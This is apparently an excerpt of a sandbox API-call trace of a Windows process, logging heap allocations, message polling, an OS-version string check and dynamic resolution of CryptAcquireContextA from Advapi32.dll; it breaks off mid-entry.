HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0265.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.836] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0265.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.836] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0265.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0265.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.837] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.837] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.837] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0265.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0265.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0265.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.837] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.837] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.838] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0265.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0265.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.838] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0265.838] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.838] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.838] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.839] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.839] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.839] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.839] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0265.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0265.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0265.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9cd8 [0265.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0265.839] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0265.839] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0265.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0265.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0265.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.839] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0265.839] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.840] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0265.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0265.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0265.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0265.840] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.840] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0265.840] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0265.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0265.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0265.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0265.840] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0265.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0265.841] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0265.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0265.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0265.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0265.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0265.841] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.841] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0265.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0265.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0265.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0265.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0265.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0265.842] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.842] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0265.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0265.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0265.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0265.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0265.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0265.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.843] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.843] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0265.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0265.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466e10, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0265.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0265.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.844] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0265.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0265.844] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3538 [0265.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.844] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0265.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0265.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x15) returned 0x2466e10 [0265.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466e10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0265.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0265.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.845] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0265.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0265.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0265.845] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0265.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0265.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.845] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.846] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0265.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.846] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.846] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0265.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0265.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0265.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0265.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.847] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0265.847] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0265.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0265.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.848] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.848] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.849] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0265.849] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.849] HeapFree (in: 